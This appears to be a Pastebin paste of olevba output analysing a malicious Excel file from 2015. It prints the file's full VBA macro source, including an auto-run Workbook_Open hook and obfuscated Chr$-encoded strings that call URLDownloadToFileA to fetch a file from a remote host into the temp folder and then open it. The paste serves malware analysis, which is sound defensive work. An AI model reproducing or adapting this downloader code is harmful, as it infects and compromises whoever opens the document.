API tools faq
paste
Advertisement
dynamoo

Malicious Excel macro

dynamoo
Mar 11th, 2015
580
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VisualBasic 8.99 KB | None | 0 0
raw download clone embed print report
  1. olevba 0.25 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MAS---- 201503071457.xls
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: 201503071457.xls
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ÝòàÊíèãà.cls
  13. in file: 201503071457.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u042d\u0442\u0430\u041a\u043d\u0438\u0433\u0430'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. Sub Workbook_Open()
  16. atqk_x482mp6v
  17. End Sub
  18. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  19. ANALYSIS:
  20. +----------+---------------+----------------------------------------+
  21. | Type     | Keyword       | Description                            |
  22. +----------+---------------+----------------------------------------+
  23. | AutoExec | Workbook_Open | Runs when the Excel Workbook is opened |
  24. +----------+---------------+----------------------------------------+
  25. -------------------------------------------------------------------------------
  26. VBA MACRO Ëèñò1.cls
  27. in file: 201503071457.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04421'
  28. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  29. (empty macro)
  30. -------------------------------------------------------------------------------
  31. VBA MACRO Ëèñò2.cls
  32. in file: 201503071457.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04422'
  33. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  34. (empty macro)
  35. -------------------------------------------------------------------------------
  36. VBA MACRO Ëèñò3.cls
  37. in file: 201503071457.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04423'
  38. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  39. (empty macro)
  40. -------------------------------------------------------------------------------
  41. VBA MACRO Class1.cls
  42. in file: 201503071457.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class1'
  43. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  44. (empty macro)
  45. -------------------------------------------------------------------------------
  46. VBA MACRO Class2.cls
  47. in file: 201503071457.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class2'
  48. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  49. (empty macro)
  50. -------------------------------------------------------------------------------
  51. VBA MACRO ÀàâïàâïÀÀ.bas
  52. in file: 201503071457.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u0410\u0430\u0432\u043f\u0430\u0432\u043f\u0410\u0410'
  53. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  54.  
  55. Public Function tIBlTVqSYlvQeRDfBAc(VdkAbaqgjbz As String) As String
  56. For HFncwnerBk = 1 To Len(VdkAbaqgjbz) Step 2
  57. tIBlTVqSYlvQeRDfBAc = tIBlTVqSYlvQeRDfBAc & Mid(VdkAbaqgjbz, HFncwnerBk, 1)
  58. Next
  59. End Function
  60.  
  61. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  62. ANALYSIS:
  63. No suspicious keyword or IOC found.
  64. -------------------------------------------------------------------------------
  65. VBA MACRO Class3.cls
  66. in file: 201503071457.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class3'
  67. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  68. (empty macro)
  69. -------------------------------------------------------------------------------
  70. VBA MACRO Class4.cls
  71. in file: 201503071457.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class4'
  72. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  73. (empty macro)
  74. -------------------------------------------------------------------------------
  75. VBA MACRO Class5.cls
  76. in file: 201503071457.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class5'
  77. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  78. (empty macro)
  79. -------------------------------------------------------------------------------
  80. VBA MACRO ûâàûâÀÀâà.bas
  81. in file: 201503071457.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u044b\u0432\u0430\u044b\u0432\u0410\u0410\u0432\u0430'
  82. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  83. #If VBA7 Then
  84.     Private Declare PtrSafe Function ãøÏÍØûâàà Lib "urlmon" Alias _
  85.     "URLDownloadToFileA" (ByVal BHGBkjsdfF As LongPtr, _
  86.     ByVal ÏÑðïñïñïïÎàï As String, _
  87.     ByVal ÏÑðïñïñïïÎàïf As String, _
  88.     ByVal ÏÑðïñïñïïÎàïfd As Long, _
  89.     ByVal ÏÑðïñïñïïÎàïfds As LongPtr) As LongPtr
  90. #Else
  91.     Private Declare Function ãøÏÍØûâàà Lib "urlmon" Alias _
  92.     "URLDownloadToFileA" (ByVal BHGBkjsdfF As Long, _
  93.     ByVal ÏÑðïñïñïïÎàï As String, _
  94.     ByVal ÏÑðïñïñïïÎàïf As String, _
  95.     ByVal ÏÑðïñïñïïÎàïfd As Long, _
  96.     ByVal ÏÑðïñïñïïÎàïfds As Long) As Long
  97. #End If
  98. Sub atqk_x482mp6v()
  99.  
  100. ðïîðïÀàâïàâï tIBlTVqSYlvQeRDfBAc(Chr$(104) & Chr$(133) & Chr$(116) & Chr$(63) & Chr$(116) & Chr$(125) & Chr$(112) & Chr$(37) & Chr$(58) & Chr$(74) & Chr$(47) & Chr$(90) & Chr$(47) & Chr$(70) & Chr$(107) & Chr$(131) & Chr$(111) & Chr$(121) & Chr$(115) & Chr$(123) & Chr$(99) & Chr$(119) & Chr$(104) & Chr$(129) & Chr$(117) & Chr$(100) & Chr$(100) & Chr$(87) & Chr$(117) & Chr$(101) & Chr$(46) & Chr$(59) & Chr$(104) & Chr$(110) & Chr$(111) & Chr$(82) & Chr$(109) & Chr$(113) & Chr$(101) & Chr$(120) & Chr$(112) & Chr$(126) & Chr$(97) & Chr$(110) & Chr$(103) & Chr$(58) & Chr$(101) & Chr$(114) & Chr$(46) & Chr$(73) & Chr$(116) & Chr$(42) & Chr$(45) & Chr$(134) & Chr$(111) & Chr$(112) & Chr$(110) & Chr$(51) _
  101. & Chr$(108) & Chr$(133) & Chr$(105) & Chr$(115) & Chr$(110) & Chr$(42) & Chr$(101) & Chr$(62) & Chr$(46) & Chr$(129) & Chr$(100) & Chr$(128) & Chr$(101) & Chr$(103) & Chr$(47) & Chr$(77) & Chr$(106) & Chr$(129) & Chr$(115) & Chr$(72) & Chr$(47) & Chr$(97) & Chr$(98) & Chr$(124) & Chr$(105) & Chr$(88) & Chr$( _
  102. 110) & Chr$(122) & Chr$(46) & Chr$(95) & Chr$(101) & Chr$(103) & Chr$(120) & Chr$(52) & Chr$(101) & Chr$(130)), Environ(tIBlTVqSYlvQeRDfBAc(Chr$(84) & Chr$(96) & Chr$(77) & Chr$(109) & Chr$(80) & Chr$(123))) & tIBlTVqSYlvQeRDfBAc(Chr$(92) & Chr$(81) & Chr$(102) & Chr$(106) & Chr$(74) & Chr$(105) & Chr$(67) & Chr$(36) & Chr$(104) & Chr$(43) & Chr$(106) & Chr$(48) & Chr$(102) & Chr$(132) & Chr$(103) & Chr$(80) & Chr$(68) & Chr$(109) & Chr$(54) & Chr$(95) & Chr$(55) & Chr$(65) & Chr$(53) & Chr$(130) & Chr$(101) & Chr$(134) & Chr$(68) & Chr$(74) & Chr$(84) & Chr$(129) & Chr$(85) & Chr$(37) & Chr$(46) & Chr$(64) & Chr$(101) & Chr$(57) & Chr$(120) & Chr$(124) & Chr$(101) & Chr$(50))
  103. End Sub
  104. Function ðïîðïÀàâïàâï(z0ktwRXRQZl2qo0_ As String, d4ok1z1Z0N As String) As Boolean
  105. ïëðïÀÀàâïï = ãøÏÍØûâàà(0&, z0ktwRXRQZl2qo0_, d4ok1z1Z0N, 0&, 0&)
  106. Set ûâàÀÀâûàûâà = CreateObject(tIBlTVqSYlvQeRDfBAc(Chr$(83) & Chr$(99) & Chr$(104) & Chr$(99) & Chr$(101) & Chr$(52) & Chr$(108) & Chr$(68) & Chr$(108) & Chr$(92) & Chr$(46) & Chr$(46) & Chr$(65) & Chr$(84) & Chr$(112) & Chr$(44) & Chr$(112) & Chr$(91) & Chr$(108) & Chr$(125) & Chr$(105) & Chr$(75) & Chr$(99) & Chr$(125) & Chr$(97) & Chr$(47) & Chr$(116) & Chr$(35) & Chr$(105) & Chr$(71) & Chr$(111) & Chr$(38) & Chr$(110) & Chr$(82)))
  107.  
  108. ûâàÀÀâûàûâà.Open Environ(tIBlTVqSYlvQeRDfBAc(Chr$(84) & Chr$(51) & Chr$(77) & Chr$(71) & Chr$(80) & Chr$(83))) & tIBlTVqSYlvQeRDfBAc(Chr$(92) & Chr$(75) & Chr$(102) & Chr$(98) & Chr$(74) & Chr$(130) & Chr$(67) & Chr$(59) & Chr$(104) & Chr$(73) & Chr$(106) & Chr$(76) & Chr$(102) & Chr$(94) & Chr$(103) & Chr$(40) & Chr$(68) & Chr$(130) & Chr$(54) & Chr$(87) & Chr$(55) & Chr$(90) & Chr$(53) & Chr$(53) & Chr$(101) & Chr$(65) & Chr$(68) & Chr$(102) & Chr$(84) & Chr$(118) & Chr$(85) & Chr$(97) & Chr$(46) & Chr$(58) & Chr$(101) & Chr$(49) & Chr$(120) & Chr$(50) & Chr$(101) & Chr$(47))
  109. End Function
  110.  
  111.  
  112.  
  113.  
  114.  
  115. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  116. ANALYSIS:
  117. +------------+--------------------+-----------------------------------------+
  118. | Type       | Keyword            | Description                             |
  119. +------------+--------------------+-----------------------------------------+
  120. | Suspicious | CreateObject       | May create an OLE object                |
  121. | Suspicious | Lib                | May run code from a DLL                 |
  122. | Suspicious | Open               | May open a file                         |
  123. | Suspicious | Environ            | May read system environment variables   |
  124. | Suspicious | Chr                | May attempt to obfuscate specific       |
  125. |            |                    | strings                                 |
  126. | Suspicious | URLDownloadToFileA | May download files from the Internet    |
  127. +------------+--------------------+-----------------------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!